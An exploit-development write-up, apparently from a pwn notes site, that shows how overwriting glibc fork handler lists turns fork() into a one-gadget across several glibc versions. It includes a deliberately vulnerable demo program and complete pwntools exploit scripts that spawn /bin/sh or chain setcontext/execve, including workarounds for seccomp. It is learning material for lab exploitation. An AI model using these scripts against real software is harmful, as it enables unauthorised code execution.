# fork\_gadget

Some of you may be familiar with the exit handlers which are ran when calling `exit()`. These are typically used to clean up anything before the program is terminated, but they're also quite useful for attackers to hijack code execution. They're ideal, because by overwriting the [\_\_exit\_funcs](https://elixir.bootlin.com/glibc/glibc-2.35/source/stdlib/cxa_atexit.c#L76) array, you can specify functions to be called, along with a controlled argument. However, one downside is that, because they're popular for attackers, they employ pointer mangling on the function pointers.

However there are other places where handlers like these are used, and one place I stumbled across when investigating the exit handlers, was the fork handlers, and after some investigation, I found some tricks to abuse the fork handlers to convert `fork` into a constraintless one gadget.

## Cheatsheet

Below is a cheatsheet for all the tricks covered in this post:

{% embed url="<https://gist.github.com/sasha-999/bcafec8de9a5620d8b38d78b7e9693fc#file-fork_gadget_cheatsheet-py>" %}

## What are the fork handlers?

`fork` has its own handlers for multiple situations:

* `prepare_handler`
* `parent_handler`
* `child_handler`

These are stored in a single array/linked list called `fork_handlers`, which exists in a writable region of libc memory, so that more handlers can be added. In each case, all of the handlers of the corresponding type are executed in a specifc order. There are a few things that separate these from exit handlers:

* :white\_check\_mark: No pointer mangling.
* :x: No argument control.

So 1 step forward, and 2 steps back. However, while we don't get explicit argument control like with exit handlers, there are similar tricks to what we did in [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md). To see that, let's have a closer look at `fork` across multiple versions, as the implementation of the handlers as changed, which also changes how we'd abuse them.

{% file src="/files/Kf3ClPLgA37jFvEVIR3o" %}
Files used for the demos
{% endfile %}

## 2.28-2.35

(The specific version used here is `2.35`)

Let's first have a look at what a `fork_handler` looks like:

<figure><img src="/files/qaxu0qUInTYyTuU5L8wl" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.35/source/include/register-atfork.h#L23">fork_handler</a></p></figcaption></figure>

* `prepare_handler`: Handlers to prepare the process to `fork`, so they're run *before* the `fork`.
* `parent_handler`: Handlers run as the *parent* after the `fork`.
* `child_handler`: Handlers run as the *child* after the `fork`.
* `dso_handle`: A unique id to identify which binary/shared library registered this handler.

These are stored in an array called `fork_handlers`, which is defined as:

<figure><img src="/files/hA6bcYDa9BdfOLXzVfKU" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.35/source/posix/register-atfork.c#L22">fork_handlers</a></p></figcaption></figure>

The way this definition works is by stating a few "parameters" using macros, then including [malloc/dynarray-skeleton.c](https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/dynarray-skeleton.c), which then defines a struct called `fork_handler_list`, plus a bunch of handlers for this struct.

<figure><img src="/files/teL89fFaMIFHU1fXwtHV" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/dynarray-skeleton.c#L125">generic struct defintion</a></p></figcaption></figure>

These `dynarray` structures are dynamically allocated arrays, which can resize if needed. Usually they have an initial buffer before it goes to the heap. Evaluating this yields:

```c
struct fork_handler_list {
        size_t size;
        size_t allocated;
        struct fork_handler* array;
        struct fork_handler scratch[48];
};
```

`fork` is defined as follows:

<figure><img src="/files/ajtid5YNXpoF6k74ZZWL" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.35/source/posix/fork.c#L40">__libc_fork</a></p></figcaption></figure>

Here we call `__run_fork_handlers` with [atfork\_run\_prepare](https://elixir.bootlin.com/glibc/glibc-2.35/source/include/register-atfork.h#L37), indicating it wants to execute the `prepare` handlers.

<figure><img src="/files/VmS8YegE3GxEezJdYX3W" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.35/source/posix/register-atfork.c#L107">__run_fork_handlers</a></p></figcaption></figure>

So now it will go through the array from the last element (for backwards compatibility reasons), executing each `prepare_handler` if they exist. The methods `fork_handler_list_size` and `fork_handler_list_at` are some of methods automically defined when we defined `fork_handler_list`, which just index the array and get the length (`used`) respectively. Locking may also be used, if there are multiple threads running.

### So what?

At first glance, taking control of code execution doesn't seem to be very doable, mainly due to the fact that we seemingly have no argument control. However, if we dig deeper, and look at the disassembly, we'll notice something interesting.

<figure><img src="/files/V7cOeTPd22MwaChNacNE" alt=""><figcaption><p><code>__run_fork_handlers</code></p></figcaption></figure>

<figure><img src="/files/qupfNEZDDqKGByAJcYqg" alt=""><figcaption><p><code>__run_fork_handlers+288</code>: Locking <code>atfork_lock</code></p></figcaption></figure>

First it checks the first argument `edi`, and if it's `0`, then it means it should run the `prepare` handlers. Then checks if it should use locking, if so, jump to `+288`, where it will lock, then resume by jumping back to `+23`.

But then something interesting happens. `[fork_handlers]` is loaded into `rbp` (which corresponds to `fork_handlers->used`), then is loaded into `rdi`. How interesting! It then goes on to call the `prepare_handler`:

<figure><img src="/files/gGDANIS9AFS405J9nG2l" alt=""><figcaption><p><code>__run_fork_handlers+84</code>: Decrements <code>rbp</code> (the index)</p></figcaption></figure>

<figure><img src="/files/VOyzggZlQBUsWbAHE8zm" alt=""><figcaption><p><code>__run_fork_handlers+48</code>: Calls the <code>prepare_handler</code></p></figcaption></figure>

So theoretically, controlling the field `used` could grant us `rdi` control.

### Why does this happen?

The reason for this is the [same reason](/pwn-notes/pwn/rop-2.34+/ret2gets.md#io_stdfile_0_lock-in-rdi) why [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md) works. Let's go back to `+84` (when the index is decremented):

<figure><img src="/files/ekQx0fjAPSWqVPCC0wBa" alt=""><figcaption><p><code>__run_fork_handlers+84</code>: Calling <code>__libc_dynarray_at_failure</code>?</p></figcaption></figure>

`+91` checks the index `rbp` is within the bounds of the array (less than `used`). If it's not, then it goes on to call [\_\_libc\_dynarray\_at\_failure](https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/dynarray_at_failure.c#L23), interestingly setting a second argument, but not a first? Well that's because it already set the first argument: when `used` gets loaded. It could load `used` into any register, but chooses `rdi`, because in the case where this error happens, it doesn't need to waste time loading it into `rdi` again, because it's already there.&#x20;

<figure><img src="/files/jPJM5YKZXqzWBdUNcNuh" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/dynarray-skeleton.c#L250">fork_handler_list_at</a>: Checks the bounds, and calls the failure function with the size and index.</p></figcaption></figure>

### Exploitation

```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void setup() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
}

int main() {
    setup();

    printf("%p\n", &fgets);
    printf("Enter address, size and data: ");
    unsigned long addr, size;
    scanf("%zu %zu ", &addr, &size);
    fgets((void*)addr, size, stdin);
    fork();
}
```

To demonstrate this, we'll use the ~~very realistic application~~ attack scenario above, where we have a libc leak, an arbitrary write, and a call to `fork` we want to hijack.

We can start by writing some basic methods to create the structures:

```python
def header(addr, size):
    return flat({
        0x00: size,
        # we don't need to control allocated
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x20*len(funcs) - 0x18)
    for i, func in zip(range(0, len(data), 0x20), funcs[::-1]):
        data[i:i+8] = p64(func)
    return data
```

So we can use `handler_array(libc.sym.system)` to craft an array that will execute `system`, but we now need to control `rdi`. We can do this by setting `used` to some pointer to `/bin/sh`. However if we use a regular address to point to the handler array, then the large `used` field will cause it to access invalid memory, as it will access the last handler. So if we need `used` to be an address, why don't we just alter the address of the handler array. As long as

```c
fork_handlers->array[fork_handlers->used-1]
```

points to our handler, then it'll work. We can forge such an address as follows:

```python
addr = (addr - (size-len(funcs))*0x20) % (1<<64)
```

Of course this will create an "address" that's complete nonsense, but that doesn't matter, as it won't access the start of the array (unless [\_\_register\_atfork](https://elixir.bootlin.com/glibc/glibc-2.35/source/posix/register-atfork.c#L34) or [\_\_unregister\_atfork](https://elixir.bootlin.com/glibc/glibc-2.35/source/posix/register-atfork.c#L75) is used). Putting this all together, we can arrive at the following exploit:

```python
#!/usr/bin/python3
from pwn import *

e = context.binary = ELF('vuln')
libc = ELF('libc', checksec=False)

p = e.process()

fgets = int(p.recvline(), 16)
log.info(f"fgets: {hex(fgets)}")

libc.address = fgets - libc.sym.fgets
log.info(f"libc: {hex(libc.address)}")

def header(addr, size):
    return flat({
        0x00: size,
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x20*len(funcs) - 0x18)
    for i, func in zip(range(0, len(data), 0x20), funcs[::-1]):
        data[i:i+8] = p64(func)
    return data

def forge_split(addr, *funcs, rdi=None):
    array = handler_array(*funcs)
    if rdi is not None:
        size = rdi
        assert size >= len(funcs)
        addr = (addr - (size-len(funcs))*0x20) % (1<<64)
    else:
        size = len(funcs)
    return header(addr, size), array

def forge(addr, *funcs, rdi=None):
    hdr, arr = forge_split(addr+0x18, *funcs, rdi=rdi)
    return hdr + arr

addr = libc.sym.fork_handlers
data = forge(addr, libc.sym.system, rdi=next(libc.search(b"/bin/sh\x00")))

assert b"\n" not in data
p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)

p.interactive()
```

### Is that all we can do?

This is the basic payload, but we can do more than just this. Take for example, a case where seccomp is in place, and we don't have access to `execve`, meaning calling `system` is useless now! Is that all we can do with a function call with a controlled argument? ~~Yes, thanks for reading.~~

This is where `setcontext` comes in! I covered this already [here](/pwn-notes/pwn/setcontext.md), but basically this allows us to get ROP through the use of a function resembling the `sigreturn` syscall. We can substitute this in as follows:

```python
def setcontext(regs, addr):
	frame = SigreturnFrame()
	for reg, val in regs.items():
		setattr(frame, reg, val)
	# needed to prevent SEGFAULT
	setattr(frame, "&fpstate", addr+0x1a8)
	fpstate = {
	0x00: p16(0x37f),	# cwd
	0x02: p16(0xffff),	# swd
	0x04: p16(0x0),		# ftw
	0x06: p16(0xffff),	# fop
	0x08: 0xffffffff,	# rip
	0x10: 0x0,			# rdp
	0x18: 0x1f80,	    # mxcsr
	}
	return flat({
	0x00 : bytes(frame),
#	0xf8: 0					# end of SigreturnFrame
	0x128: 0,				# uc_sigmask
	0x1a8: fpstate,			# fpstate
	})

addr = libc.sym.fork_handlers

addr_ctx = addr+0x20
data = forge(addr, libc.sym.setcontext, rdi=addr_ctx) + setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in data
```

For demo purposes, I'm just executing `execve`, but you can do much more with `setcontext`.

### gets

Both of these examples require the `/bin/sh` string or the `SigreturnFrame` to already exist in memory, or be apart of the arbitrary write. But what if we don't have such a luxury? Well since `rdi` will be controlled for every function call, we can use `gets` to write data to the argument, before using it for `system`:

```python
addr = libc.sym.fork_handlers
data = forge(addr, libc.sym.gets, libc.sym.system, rdi=addr+0x200)
assert b"\n" not in data
# could also be any command we wish
extra_data = b"/bin/sh"

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)

if extra_data:
    p.sendline(extra_data)

p.interactive()
```

Or `setcontext`:

```python
addr = libc.sym.fork_handlers

addr_ctx = addr+0x20
data = forge(addr, libc.sym.gets, libc.sym.setcontext, rdi=addr_ctx)
assert b"\n" not in data

extra_data = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200,
}, addr_ctx)
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)

if extra_data:
    p.sendline(extra_data)

p.interactive()
```

### Seccomp strikes back!

Our good old ~~friend~~ enemy seccomp isn't always easily defeated by `setcontext`, because there's a nuisance I have yet to cover. If we have another look at `setcontext`:

<figure><img src="/files/Suu2qJzUUEwpgNEaUlqQ" alt=""><figcaption><p><code>setcontext</code>: Calling <code>sigprocmask</code> syscall.</p></figcaption></figure>

We see that it executes a syscall *before* it sets the context, with syscall number `0xe`. This is `sigprocmask`, and while it may not be on the radar of any blacklists, it could be easily left out of a whitelist (like `seccomp`'s strict mode), meaning this could invoke `seccomp`'s wrath.

What if we tried to skip the syscall? It's a good suggestion, but a wrench in the plan here is the fact that it restores the pointer to the context in `rdx`, not `rdi`, so we'd need to control `rdx` somehow.

Wouldn't it be nice if we could convert our current `rdi` control into `rdx` control, because `rdx` isn't used by `__run_fork_handlers`. Well it turns out there is a gadget that can do just that!

<figure><img src="/files/KO7l9vw9NrbXTQ5Tv7d0" alt=""><figcaption><p><code>mov rdx, rdi</code> gadget</p></figcaption></figure>

Exactly one in fact. However if you're anything like me (~~and I surely hope not~~), you'd wonder where this came from, and is this something that's likely to come up across multiple versions of libc, because it would be nice if our techniques were portable(ish).

<figure><img src="/files/uNhoSONpeFz6X37gqF4N" alt=""><figcaption><p><code>x/10i 0xc5044</code></p></figcaption></figure>

<figure><img src="/files/fMcfc4JyPKeBfs17yAt5" alt=""><figcaption><p><code>__memset_erms</code></p></figcaption></figure>

It seems to belong to a function `__memset_erms`, which in hindsight makes sense. It explains the `rep stos` instruction: it's filling the buffer with the character `al`. And since `rep stos` increments `rdi`, it needs to save a copy, so that it can return that original pointer, as that's the [defined behaviour](https://man7.org/linux/man-pages/man3/memset.3.html#RETURN_VALUE) of `memset`.

But why did it compile like this, and why is `rdx` used, surely this could change, right? Well let's find out:

<figure><img src="/files/ewAGRLtcaHdXv02hhjCg" alt=""><figcaption><p>Using <code>list</code> to find where it's defined.</p></figcaption></figure>

<figure><img src="/files/x4yIkRcm46kNGJVVcfH2" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.35/source/sysdeps/x86_64/multiarch/memset-vec-unaligned-erms.S#L150">__memset_erms</a></p></figcaption></figure>

Turns it the reason it compiled that way, is because that's exactly how libc wanted it: it used assembly language (`.S` is a common extension for assembly language files). From what I could see, this behaviour is also consistent across many versions, probably because there's no real reason to change it:

* It's simple, so not much to change in the first place.
* If it ain't broke, don't fix it.
* It's not actually used, it's just used for performance measuring.

Fantastic, we have a `mov rdx, rdi` gadget! But one final snag, we ideally want to set `rcx` or `rdx` to `0` before this gadget executes, so that `rep stos` finishes immediately (i.e. doesn't run).

<figure><img src="/files/UKsEtEveqauHuperzZ9w" alt=""><figcaption><p>Where to jump to + preconditions</p></figcaption></figure>

<figure><img src="/files/9BJ5P0uBPKYsJYoYCxSm" alt=""><figcaption><p>Null <code>rcx</code> gadgets</p></figcaption></figure>

<figure><img src="/files/NrKAl8JsAaF2xgmemB2M" alt=""><figcaption><p>Null <code>rdx</code> gadgets</p></figcaption></figure>

Putting this all together, we arrive at the following:

```python
addr = libc.sym.fork_handlers

addr_ctx = addr+0x100
data = forge(addr, libc.sym.gets, libc.address+0xa85d8, libc.sym.__memset_erms+13, libc.sym.setcontext+45, rdi=addr_ctx)
assert b"\n" not in data

extra_data = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()
```

### 2.28-2.29

There's a weird edge case that I found with `2.28-2.29`, which seems to coincide with the versions that didn't have the `do_locking` argument (which was added in [2.30](https://elixir.bootlin.com/glibc/glibc-2.30/source/nptl/register-atfork.c#L110)).

<figure><img src="/files/v9wf3TD8Ti2vGpodj2BE" alt=""><figcaption><p><code>2.29</code> first <code>prepare_handler</code> call</p></figcaption></figure>

Above we see that the `used` field is loaded into `rax`, but not into `rdi`. But after the first call:

<figure><img src="/files/YnSMQ2yj2reJiTUgTZbC" alt=""><figcaption><p><code>2.29</code> second <code>prepare_handler</code> call</p></figcaption></figure>

`used` *is* loaded into `rdi`. Weird...

I can't quite explain why this happens, but this is more just a word of warning, that this isn't an exact science. If you find this happening, you can always just start by doing a `ret` to get past the first call, which would also be compatible with `2.30+`.

And if it doesn't happen at all?

Well, `rdi` shouldn't be used by anything else if it's not used for `used`, so [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md) would also be a possibility, however I am yet to test it.

## 2.36+

(The specific version used here is `2.39`)

You'll have noticed that the previous section was specifically for `2.28-2.35`. This is because the implementation of `fork_handlers` changes throughout the versions. So, what's changed now?

Well, not much actually. Firstly, the `fork_handler` struct has a new field: `id`

<figure><img src="/files/kbGQ4Jc2cLTKLXi0uWZB" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.39/source/include/register-atfork.h#L23">fork_handler</a></p></figcaption></figure>

And a separate function for running `prefork` handlers has been created:

<figure><img src="/files/4BPSEVQMzxnsOZrJhIFr" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.39/source/posix/fork.c#L40">__libc_fork</a></p></figcaption></figure>

The function for running `prefork` handlers isn't much different either:

<figure><img src="/files/ww5ncZMXkgUEDNq2Zu25" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.39/source/posix/register-atfork.c#L128">__run_prefork_handlers</a></p></figcaption></figure>

The main addition is the use of `id`. What seems to be implied by the comments here, is that now each handler has a unique `id`, which increments each time a new one is added. This means ones added later will have a larger `id`. Due to the different locking pattern here, handlers could be de-registered and/or registered when a `prepare_handler` is being executed, so it ensures that only ones that were present before the current one was are executed, therefore skipping ones with a *higher* `id`.

For us, all this changes is that the structure of `fork_handler` is different, and we just need to include an `id` field, where it's increasing with each handler. The updated handlers are as follows:

```python
def header(addr, size):
    return flat({
        0x00: size,
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x28*len(funcs))
    for i, func in enumerate(funcs[::-1]):
        off = i*0x28
        data[off:off+8] = p64(func)
        data[off+0x20:off+0x28] = p64(i)
    return data

def forge_split(addr, *funcs, rdi=None):
    array = handler_array(*funcs)
    if rdi is not None:
        size = rdi
        assert size >= len(funcs)
        addr = (addr - (size-len(funcs))*0x28) % (1<<64)
    else:
        size = len(funcs)
    return header(addr, size), array

def forge(addr, *funcs, rdi=None):
    hdr, arr = forge_split(addr+0x18, *funcs, rdi=rdi)
    return hdr + arr
```

### Revenge of the seccomp!

While these changes don't affect the regular cases for `system("/bin/sh")` or `setcontext`, it (indirectly) affects the `setcontext` case where we need to skip `sigprocmask`. In the version of glibc I used for the demo, `rdx` is used by `__run_prefork_handlers`:

<figure><img src="/files/hn4CFcGmRfFEZwzOrljE" alt=""><figcaption><p>After <code>prepare_handler</code> call.</p></figcaption></figure>

Here we see at `+128` that `rdx=5*r14`, where `r14` is `sl` (the number of handlers). `rdx` then gets multiplied by `8`, which ultimately means `r14` got multiplied by `40`/`0x28`, (the size of `fork_handler`). This is in preparation for the loop where it checks the `id` fields, which is why it actually points to the previous handler's `id` field (`-0x30` instead of `-0x28`).

In this case, we can actually set `used` to a value that, when multiplied by 5, points to a context. This will make `rdi` a junk value, which means you can't use `gets` to populate the context (RIP), but apart from that, it's no problem!

```python
ret = ROP(libc).find_gadget(["ret"]).address

addr = libc.sym.fork_handlers

addr_ctx = addr+0x100
addr_ctx += (-addr_ctx) % 5
rdi = addr_ctx // 5

data = forge(addr, ret, libc.sym.setcontext+45, rdi=rdi)
data = data.ljust(addr_ctx-addr, b"X")
data += setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.interactive()
```

## 2.27 and prior

(The specific version used here is `2.27`)

You may be wondering why I'm ending with the earliest implementation. This is because the later versions are more trivial, both in how `fork_handlers` is implemented, but also how they're exploited. This is because we no longer have the `rdi` control trick through the `used` field.

`fork_handler` is now defined as:

<figure><img src="/files/yrAaQ22v5OS9s8h3niw0" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/nptl/fork.h#L31">fork_handler</a></p></figcaption></figure>

A few more fields than before:

* `next`: Points to next handler, as `__fork_handlers` is now a singly linked list.
* `refcntr`: Reference count of this handler.
* `need_signal`: Unused in `fork`, so we'll ignore it.

We're no longer using a `dynarray`, so there is no `used` field to control to gain `rdi` control (cringe). Let's have a look at `fork` then:

<figure><img src="/files/BSZO2vdWCEWgeNyM09Yv" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/nptl/fork.c#L48">__libc_fork</a></p></figcaption></figure>

Not much so far, it just checks `THREAD_SELF` for if the process is multi-threaded. There's also no function for handing the fork handlers anymore: it's incorporated into `fork` itself.

<figure><img src="/files/8kxoaERXMzGlcfEY0isa" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/nptl/fork.c#L65">__libc_fork</a>: Access <code>__fork_handlers</code></p></figcaption></figure>

First it needs to access the root of the linked list of handlers: `__fork_handlers`. However since the process could be multi-threaded ~~and they didn't dicover locking yet~~ it needs to do it in a thread-safe way (hence the weirdness with `atomic_full_barrier` etc.) but the jist is that it will grab `__fork_handlers` if it exists, and (atomically) increment the `refcntr` to claim ownership of it, ensuring it doesn't get freed while it's in use here.

{% hint style="info" %}
A lock doesn't seem to be needed, as the `fork_handler` entries are constant (besides `refcntr`, which is handled atomically, therefore not susceptible to racing). While it does work, the code with locking is just nicer.
{% endhint %}

<figure><img src="/files/ozfP0srjQwNhQO1WavDo" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/nptl/fork.c#L92">__libc_fork</a>: Executing <code>prepare_handler</code>'s</p></figcaption></figure>

This now seems familiar, but instead of an accessing an array, it's cycling through a linked list. It also saves the handlers it uses, so that it can the same ones later for `parent_handler` and `child_handler`. To do this, it needs to claim ownership, so it increments the `refcntr`.

Importantly, there's no function calls with arguments present here, except for [alloca](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/alloca.h#L35) (compiler builtin) and [atomic\_increment](https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/x86_64/atomic-machine.h#L282) (`asm` block). So unlike `2.28+`, there's no `rdi` control, because no functions (with a first argument) are called.

We can write methods to forge a `fork_handler` list as follows:

```python
def forge(addr, *funcs):
    assert funcs
    data = b""
    for i, func in enumerate(funcs):
        next = addr+len(data)+0x30
        data += flat({
            0x00: next if i==len(funcs)-1 else 0,
            0x08: func,
            0x28: p32(1),
        }, length=0x30)
    return data

def forge_packed(addr, *funcs, smallest=False):
    assert funcs
    if smallest:
        # some refcntrs are outside our data
        # (except the first one, which we need to control)
        # these will be incremented, and potentially corrupt some memory
        # be careful when using this
        size = max(0x28+4, 0x10*len(funcs))
    else:
        # all refcntrs are contained in our data
        size = 0x28 + 0x10*len(funcs) - 0xc
    data = bytearray(size)
    addrs = [addr+0x10*i for i in range(1, len(funcs))] + [0]
    for i, (addr, func) in enumerate(zip(addrs, funcs)):
        off = i*0x10
        data[off:off+0x10] = p64(addr) + p64(func)
    for i in range(len(funcs)):
        off = 0x28 + 0x10*i
        if off+4 > len(data):
            break
        val = u32(bytes(data[off:off+4])) - 1
        # the first refcntr must be non-zero
        # otherwise it'll loop forever
        if i == 0:
            assert val != 0
        data[off:off+4] = p32(val % (1<<32))
    return bytes(data)
```

You can do a standard array (`forge`), or you can utilise the unused space to pack it as much as possible (`forge_packed`). Both must contain at least the first `refcntr` though, as we need to ensure that that is non-zero. The rest of the `refcntr`'s will be incremented, and if these are outside our data, they *might* corrupt other data, but if that's not a concern, then you can use `smallest=True`.

### ret2rand

Therefore the only way we can control `rdi` is through `prepare_handler` calls. We need a function that will populate `rdi` with some writable address, which we could then write to using `gets`.  [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md) is unfortunately not very applicable here, as it's quite limited prior to `2.30` ([see here](https://sashactf.gitbook.io/pwn-notes/pwn/pages/pKfmKyEye0hMtzHAJiux#glibc-prior-to-2.30)).

Thankfully, I was able to find an alternative: `rand`.

[rand](https://linux.die.net/man/3/rand) is a psuedo random number generator, and with that comes the need to keep track of the random state. In this case, that state is [unsafe\_state](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L160), which is of type `random_state`:

<figure><img src="/files/iDsckQC8xoinzoVkhYE8" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L287">random</a></p></figcaption></figure>

This state is passed to `__random_r`, as the first argument :eyes:. What's more is that `__random_r` is relatively simple, doesn't make any function calls, or alter the pointer itself, which means that it can just keep `unsafe_state` in `rdi` (we'll look at this in a bit).

#### But what about the locking?

Well that's a good question, because we've seen before (in [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md#io_stdfile_0_lock-in-rdi)) that locking `lock` can result in `lock` being loaded into `rdi`.

<figure><img src="/files/VEZxdqOp5g5CeQzuxuqk" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/nptl/libc-lockP.h#L210">__libc_lock_unlock</a></p></figcaption></figure>

Ah, it's our good ol' friend `lll_unlock`.

<figure><img src="/files/aQXmcfhoNP95YrBVfnXO" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/unix/sysv/linux/x86_64/lowlevellock.h#L196">lll_unlock</a>: Written in assembly</p></figcaption></figure>

<figure><img src="/files/Hx0j46nbaV3qDt6apvvv" alt=""><figcaption><p><code>lll_unlock</code> in <code>__random</code></p></figcaption></figure>

Just like in [ret2gets prior to 2.30](https://sashactf.gitbook.io/pwn-notes/pwn/pages/pKfmKyEye0hMtzHAJiux#glibc-prior-to-2.30), it only unlocks by using `lll_unlock_wait_private` when it's multi-threaded, thus the single thread case works flawlessly and doesn't touch `rdi`.

The multi-threaded case is a bit more complex, but if it's locked with the value [LLL\_LOCK\_INITIALIZER\_LOCKED](https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/unix/sysv/linux/x86_64/lowlevellock.h#L57) (1), then it also doesn't touch `rdi` (yay). However, `lock` can also contain the value [LLL\_LOCK\_INITIALIZER\_WAITERS](https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/unix/sysv/linux/x86_64/lowlevellock.h#L58) (2), in which case the `dec` won't result in `0`, and will execute `lll_unlock_wait_private`, thus clobbering `rdi`.

This should be unlikely to happen to `rand`'s [lock](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L197), as you'd need multiple threads trying to access `rand` at the same time, but it's not impossible, so be careful.

#### Exploitation

So let's go back to `random`, specifically `__random_r`. We can use `rand` followed by `gets` to write to the `unsafe_state`, but we'll need to call `rand` again to put `unsafe_state` back into `rdi` after `gets`. And if we call `rand` using a corrupted `unsafe_state`, then we could cause a crash?

So we need to conform to `random_state`:

<figure><img src="/files/HYmZE7RvAkzzlKTvpnj9" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/stdlib.h#L423">random_data</a></p></figcaption></figure>

But this contains multiple pointers, including at the beginning, where we might want to put `/bin/sh` string for example! But are these always used? Let's check `__random_r`:

<figure><img src="/files/acMMtaJo8lSiRNQt33pL" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random_r.c#L353">__random_r</a></p></figcaption></figure>

At first glance, we can see the `fptr`, `rptr`, `state` pointers being used in the `else` clause. However, there's an interesting case: `buf->rand_type == TYPE_0`. This seems to be much simpler, and doesn't use `fptr` or `rptr`! It does still use `state`, but as long as it's populated with a writable address, it won't `SEGFAULT`. The default `rand_type` is [TYPE\_3](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L119), but we can easily overwrite it to [TYPE\_0](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L101).

Putting this together, we arrive at the following for `system("/bin/sh")`:

```python
addr = libc.sym.__fork_handlers
data = p64(addr+8) + forge_packed(addr+8, libc.sym.rand, libc.sym.gets, libc.sym.rand, libc.sym.system)
assert b"\n" not in data

extra_data = flat({
    0x00: b"/bin/sh\x00",
    0x10: libc.sym.randtbl+4,    # the previous `state` field
    0x18: p32(0),   # TYPE_0
})
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()
```

We're also able to use this for `setcontext`:

```python
addr = libc.sym.__fork_handlers
data = p64(addr+8) + forge_packed(addr+8, libc.sym.rand, libc.sym.gets, libc.sym.rand, libc.sym.setcontext)
assert b"\n" not in data

ucontext = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": libc.sym.unsafe_state+0x200
}, libc.sym.unsafe_state)

extra_data = flat({
    0x10: libc.sym.randtbl+4,
    0x18: p32(0),   # TYPE_0
})
extra_data += ucontext[len(extra_data):]
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()
```

### Return of the seccomp

<figure><img src="/files/JLGgtbh0Y7w04JU9pTZx" alt=""><figcaption></figcaption></figure>

This time our work is actually mostly done for us, because `2.27` and prior, `setcontext` doesn't use `rdx` for the `ucontext`.

<figure><img src="/files/lPIf2LGpeLsY7GIhvTr4" alt=""><figcaption><p><code>setcontext</code> after <code>sigprocmask</code></p></figcaption></figure>

So it's just as simple as jumping to `setcontext+37` (or later).

## Detecting arguments to handlers

